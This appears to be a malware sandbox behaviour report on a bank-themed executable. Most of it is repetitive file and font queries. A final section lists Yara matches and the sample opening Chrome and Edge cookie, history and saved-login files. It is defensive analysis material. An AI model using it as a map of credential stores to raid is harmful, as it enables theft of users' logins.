Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1801804713.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match

File source: 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
